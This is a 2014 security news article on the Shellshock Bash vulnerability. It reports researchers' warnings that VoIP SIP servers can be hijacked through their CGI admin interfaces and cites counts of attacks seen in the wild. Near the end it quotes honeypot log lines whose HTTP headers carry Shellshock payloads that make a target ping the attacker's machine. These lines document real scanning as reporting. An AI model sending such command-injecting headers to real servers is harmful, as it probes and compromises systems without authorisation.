ShellShock could be used to hack VoIP systems

Pierluigi Paganini September 28, 2014

Jaime Blasco at AlienVault Labs explained that ShellShock vulnerability could be  exploited to hack Voice over IP systems worldwide.

The Shellshock Bash is monopolizing the debate on the Internet security in these days, every vendor is assessing its product to verify the impact of the critical vulnerability Bash Bug (CVE-2014-6271). Apple recently announced that its Mac OS X based computers are safe by default meanwhile Oracle announced that at least 32 of its solutions are affected.

As I explained several times, the impact of Shellshock Bash is really serious, an impressive amount of devices and service run vulnerable software that are not easy to update, let’s think, for example to IoT devices or voice-over-IP (VoIP) phone systems.

Today we will talk about the exposure of VOIP systems to the Shellshock Bash, compromising these systems threat actors could access to business communication systems with serious repercussion for enterprise security.

The Shellshock Bash bug affects also VoIP phone vendor’s session initiation protocol (SIP) server as revealed by the director of AlienVault Labs, Jaime Blasco, and as usually happen the flaw is likely widespread because many vendors use similar architectures.

“I’m pretty sure that there are a bunch of them (vendors), if not a lot of them, that you can exploit,” Blasco said declining to name the vendor.

The main component of VoIP systems is the SIP server, which often runs on Unix or Linux, another critical component is such architecture is the media server. While the media server implements media management functionalities, such as the transmission of the audio, the VoIP server is typically used to manage users’ configuration and phone hardware managements.

shellshock-command-diagram-600px

Unfortunately a large number of SIP servers run GNU BASH which is affected by the Shellshock vulnerability, this means that an attacker could exploit it to execute malicious commands by sending them via the Common Gateway Interfaceof the SIP server’s administrative interface.

“Even if you don’t have the username and password (for the SIP server), you can exploit the vulnerability,” Blasco said.

The possibility for at attacker are different, threat actors could exploit the Shellshock flaw to change the configuration of the VoIP systems, to add and remove new users and hardware to the system, or to serve a malware to the SIP server and gain access to a company network.

The attacks to VoIP systems are very common, phone systems are privileged targets for hackers that intend to spy on communications of the targeted organization.

The disclosure of the Shellshock flaw has triggered a series of attacks on a large scale, security researchers reported that bad actors were trying to exploit Bash Bug flaw worldwide.

Security firm Incapsula reported that in a 12-hour period, its systems recorded 725 attacks, originated from 400 unique IP addresses mainly located in US and China,  per hour against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.

Typically attackers run scanning of the entire Internet to identify vulnerable machines and run the exploits, their purpose is compromise targeted machines to recruit in botnet.

Experts at AlienVault are running a new module in their honeypots to track the attempts exploiting the ShellShock bug, in just 24 hours they detected several hits.

The majority of attacks is scanning the Internet simple sending a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138

The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different pieces of malware on the victims and it is just the beginning!

Pierluigi Paganini

(Security Affairs – ShellShock, Linux)



you might also like

leave a comment